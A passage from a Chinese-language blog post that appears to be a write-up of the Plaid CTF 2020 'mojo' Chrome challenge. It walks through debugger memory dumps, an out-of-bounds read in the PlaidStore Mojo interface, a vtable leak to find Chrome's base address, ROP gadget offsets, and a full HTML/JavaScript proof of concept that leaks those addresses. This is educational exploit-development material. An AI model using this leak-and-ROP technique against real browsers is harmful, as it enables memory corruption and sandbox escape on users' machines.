<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/30gx 0x0000191d2c60ac80</span><br><span class="line">0x191d2c60ac80: 0x0000000000000000 --&gt; left     0x0000000000000000 --&gt; right</span><br><span class="line">0x191d2c60ac90: 0x0000191d2c5dd108 --&gt; parent      0x000055555824ff01 --&gt;最后的01就是is_black</span><br><span class="line">0x191d2c60aca0: 0x0000000061616161 --&gt; string start     0x0000000000000000</span><br><span class="line">0x191d2c60acb0: 0x0400000000000000 --&gt; string end     0x0000191d2c6116b0 --&gt;vector</span><br><span class="line">0x191d2c60acc0: 0x0000191d2c6116c0      0x0000191d2c6116c0</span><br><span class="line">0x191d2c60acd0: 0xffffe6e0790d9942      0xffffe6e079359582</span><br></pre></td></tr></table></figure>
<p>接下来我们查看vector</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/20gx 0x0000191d2c6116b0</span><br><span class="line">0x191d2c6116b0: 0x3131313131313131      0x3131313131313131</span><br><span class="line">0x191d2c6116c0: 0xffffe6e079342862      0xffffe6e079342812</span><br><span class="line">0x191d2c6116d0: 0xffffe6e079342802      0xfffffffd55553ec2</span><br><span class="line">0x191d2c6116e0: 0xffffe60000000001      0xfffffffd55553ec2</span><br><span class="line">0x191d2c6116f0: 0xffffe60000000002      0xfffffffd55553ec2</span><br><span class="line">0x191d2c611700: 0xffffe60000000001      0xfffffffd55553ec2</span><br></pre></td></tr></table></figure>
<p>我们可以简单看一下vector的代码就可以知道vector是什么样子的了，首先是vector中的元素，然后就是其起始和结束地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">class __vector_base</span><br><span class="line">    pointer                                         __begin_;</span><br><span class="line">    pointer                                         __end_;</span><br><span class="line">    __compressed_pair&lt;pointer, allocator_type&gt; __end_cap_;</span><br></pre></td></tr></table></figure>
<p>而此时我们的oob，也就是从vector的起始地址开始，可以越界读到后面的任意地址的值。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; vmmap 0x191d2c5dd0f0</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">             Start                End Perm     Size Offset File</span><br><span class="line">    0x191d2c28a000     0x191d2c28b000 ---p     1000      0 [anon_191d2c28a]</span><br><span class="line">►   0x191d2c28b000     0x191d2c68a000 rw-p   3ff000      0 [anon_191d2c28b] +0x3520f0</span><br><span class="line">    0x555555554000     0x55555824b000 r--p  2cf7000      0 /media/lanan/76286875BA4E14EF/Browser-pwn/Vulnerability analyze/Plaid-CTF-2020-mojo/mojo/chrome</span><br><span class="line">pwndbg&gt; vmmap 0x0000191d2c6116b0</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">             Start                End Perm     Size Offset File</span><br><span class="line">    0x191d2c28a000     0x191d2c28b000 ---p     1000      0 [anon_191d2c28a]</span><br><span class="line">►   0x191d2c28b000     0x191d2c68a000 rw-p   3ff000      0 [anon_191d2c28b] +0x3866b0</span><br><span class="line">    0x555555554000     0x55555824b000 r--p  2cf7000      0 /media/lanan/76286875BA4E14EF/Browser-pwn/Vulnerability analyze/Plaid-CTF-2020-mojo/mojo/chrome</span><br></pre></td></tr></table></figure>
<p>由于impl和vector在同一段上，其应该都是通过partitionAlloc动态分配出来的，所以我们可以大量分配impl，从而使impl和vector接近线性交替存放，并最终leak出来，这里我们的判断依据是虚表地址是页对齐的，也就是最后的0x7a0是不变的，从而找到虚表地址。<br>因为虚表地址在chrome的只读数据段中(.rodata)上，所以可以通过减去偏移找到chrome的基地址。<br>这个偏移的计算相当简单，我一般直接vmmap看一下加载基地址，然后减去即可找到偏移。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; vmmap 0x000055555f50a7a0</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">             Start                End Perm     Size Offset File</span><br><span class="line">    0x55555824b000     0x55555f455000 r-xp  720a000 2cf6000 /media/lanan/76286875BA4E14EF/Browser-pwn/Vulnerability analyze/Plaid-CTF-2020-mojo/mojo/chrome</span><br><span class="line">►   0x55555f455000     0x55555faf2000 r--p   69d000 9eff000 /media/lanan/76286875BA4E14EF/Browser-pwn/Vulnerability analyze/Plaid-CTF-2020-mojo/mojo/chrome +0xb57a0</span><br><span class="line">    0x55555faf2000     0x55555fb4e000 rw-p    5c000 a59b000 /media/lanan/76286875BA4E14EF/Browser-pwn/Vulnerability analyze/Plaid-CTF-2020-mojo/mojo/chrome</span><br><span class="line">pwndbg&gt; vmmap</span><br><span class="line">LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA</span><br><span class="line">             Start                End Perm     Size Offset File</span><br><span class="line">    0x191d2c28a000     0x191d2c28b000 ---p     1000      0 [anon_191d2c28a]</span><br><span class="line">    0x191d2c28b000     0x191d2c68a000 rw-p   3ff000      0 [anon_191d2c28b]</span><br><span class="line">    0x555555554000     0x55555824b000 r--p  2cf7000      0 /media/lanan/76286875BA4E14EF/Browser-pwn/Vulnerability analyze/Plaid-CTF-2020-mojo/mojo/chrome</span><br><span class="line">pwndbg&gt; p/x 0x000055555f50a7a0-0x555555554000</span><br><span class="line">$3 = 0x9fb67a0</span><br></pre></td></tr></table></figure>
<p>有了这个之后我们需要寻找gadget，这里我们使用Ropgadget来寻找</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary=./chrome &gt; gadget.txt</span><br><span class="line">---</span><br><span class="line">//0x000000000880dee8 : xchg rsp, rax ; clc ; pop rbp ; ret</span><br><span class="line">//0x0000000002e4630f : pop rdi ; ret</span><br><span class="line">//0x0000000002d278d2 : pop rsi ; ret</span><br><span class="line">//0x0000000002e9998e : pop rdx ; ret</span><br><span class="line">//0x0000000002e651dd : pop rax ; ret</span><br><span class="line">//0x0000000002ef528d : syscall</span><br></pre></td></tr></table></figure>
<p>之后我们就可以写出来泄露地址的poc了</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 调用MojoJs接口时一定要把这些js包含在html中--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/mojo/public/js/mojo_bindings.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;mojo_js/third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">dec2hex</span>(<span class="params">dec</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + dec.<span class="title function_">toString</span>(<span class="number">16</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">bytes2WORD</span>(<span class="params">bytes</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> value = <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">8</span>; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">            value = value * <span class="number">0x100</span> + bytes[<span class="number">7</span> - i];</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> value;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">sucess</span>(<span class="params">message</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;[+] &#x27;</span> + message);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">//OOB</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">oob</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;OOB test&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> ps_list = [];</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> try_size = <span class="number">100</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> vt_addr = <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> render_frame_host_addr = <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> code_base = <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; try_size; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> pipe = <span class="title class_">Mojo</span>.<span class="title function_">createMessagePipe</span>();</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">//使PlaidStore与接口绑定</span></span></span><br><span class="line"><span class="language-javascript">            <span class="title class_">Mojo</span>.<span class="title function_">bindInterface</span>(</span></span><br><span class="line"><span class="language-javascript">                blink.<span class="property">mojom</span>.<span class="property">PlaidStore</span>.<span class="property">name</span>,</span></span><br><span class="line"><span class="language-javascript">                pipe.<span class="property">handle1</span>, <span class="string">&quot;context&quot;</span>, <span class="literal">true</span></span></span><br><span class="line"><span class="language-javascript">            );</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> plaidstorePtr = <span class="keyword">new</span> blink.<span class="property">mojom</span>.<span class="title class_">PlaidStorePtr</span>(pipe.<span class="property">handle0</span>);</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">await</span> plaidstorePtr.<span class="title function_">storeData</span>(<span class="string">&quot;aaaa&quot;</span>,<span class="keyword">new</span> <span class="title class_">Array</span>(<span class="number">0x30</span>).<span class="title function_">fill</span>(<span class="number">0x31</span>)); <span class="comment">// key =&gt; &lt;vector&gt;data</span></span></span><br><span class="line"><span class="language-javascript">            ps_list.<span class="title function_">push</span>(plaidstorePtr);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; try_size; i++)&#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">if</span>(vt_addr != <span class="number">0</span>)&#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">break</span>;</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> tmp_ps_ptr = ps_list[i];</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">let</span> r = <span class="keyword">await</span> tmp_ps_ptr.<span class="title function_">getData</span>(<span class="string">&quot;aaaa&quot;</span>,<span class="number">0x100</span>); <span class="comment">// 这里是为了防止读到稀奇古怪的地址</span></span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">let</span> oob_data = r.<span class="property">data</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0x30</span>; i&lt; <span class="number">0x100</span>; i++)&#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">let</span> tmp_oob_data = <span class="title function_">bytes2WORD</span>(oob_data.<span class="title function_">slice</span>(i,i+<span class="number">8</span>));</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">if</span>(<span class="title function_">dec2hex</span>(tmp_oob_data &amp; <span class="number">0xfff</span>) == <span class="string">&quot;0x7a0&quot;</span>)&#123;</span></span><br><span class="line"><span class="language-javascript">                    vt_addr = tmp_oob_data;</span></span><br><span class="line"><span class="language-javascript">                    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;vt_addr &quot;</span> + <span class="title function_">dec2hex</span>(vt_addr));</span></span><br><span class="line"><span class="language-javascript">                    code_base = vt_addr - <span class="number">0x9fb67a0</span>;</span></span><br><span class="line"><span class="language-javascript">                    render_frame_host_addr = <span class="title function_">bytes2WORD</span>(oob_data.<span class="title function_">slice</span>(i+<span class="number">8</span>, i+<span class="number">16</span>));</span></span><br><span class="line"><span class="language-javascript">                    <span class="keyword">break</span>;</span></span><br><span class="line"><span class="language-javascript">                &#125;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">if</span>(vt_addr != <span class="number">0</span>)&#123;</span></span><br><span class="line"><span class="language-javascript">                    <span class="keyword">break</span>;</span></span><br><span class="line"><span class="language-javascript">                &#125;</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">if</span>(vt_addr == <span class="number">0</span>)&#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">throw</span>(<span class="string">&quot;Error!&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">var</span> chrome_text_addr = code_base;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;chrome_test_addr = &quot;</span>, <span class="title function_">dec2hex</span>(chrome_text_addr));</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> pop_rbp_ret = chrome_text_addr + <span class="number">0x880dee8</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;pop_rbp_ret = &quot;</span>, <span class="title function_">dec2hex</span>(pop_rbp_ret));</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> pop_rdi_ret = chrome_text_addr + <span class="number">0x2e4630f</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;pop_rdi_ret = &quot;</span>, <span class="title function_">dec2hex</span>(pop_rdi_ret));</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> pop_rsi_ret = chrome_text_addr + <span class="number">0x2d278d2</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;pop_rsi_ret = &quot;</span>, <span class="title function_">dec2hex</span>(pop_rsi_ret));</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> pop_rdx_ret = chrome_text_addr + <span class="number">0x2e9998e</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;pop_rdx_ret = &quot;</span>, <span class="title function_">dec2hex</span>(pop_rdx_ret));</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> pop_rax_ret = chrome_text_addr + <span class="number">0x2e651dd</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;pop_rax_ret = &quot;</span>, <span class="title function_">dec2hex</span>(pop_rax_ret));</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> syscall = chrome_text_addr + <span class="number">0x2ef528d</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;syscall = &quot;</span>, <span class="title function_">dec2hex</span>(syscall));</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="title function_">oob</span>();</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>泄露出来地址如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&quot;vt_addr 0x557fa91177a0&quot;</span><br><span class="line">&quot;chrome_test_addr =  0x557f9f161000&quot; </span><br><span class="line">&quot;pop_rbp_ret =  0x557fa796eee8&quot; </span><br><span class="line">&quot;pop_rdi_ret =  0x557fa1fa730f&quot; </span><br><span class="line">&quot;pop_rsi_ret =  0x557fa1e888d2&quot; </span><br><span class="line">&quot;pop_rdx_ret =  0x557fa1ffa98e&quot; </span><br><span class="line">&quot;pop_rax_ret =  0x557fa1fc61dd&quot; </span><br><span class="line">&quot;syscall     =  0x557fa205628d&quot;</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/chrome/" rel="tag"># chrome</a>
              <a href="/tags/mojo/" rel="tag"># mojo</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/10/20/mojo-%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" rel="prev" title="mojo-基础知识">
                  <i class="fa fa-angle-left"></i> mojo-基础知识
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/11/20/%E6%95%B0%E5%AD%97%E7%BB%8F%E6%B5%8E%E7%BA%BF%E4%B8%8B-Chrome-pwn/" rel="next" title="数字经济线下-Chrome pwn">
                  数字经济线下-Chrome pwn <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">蓝桉</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
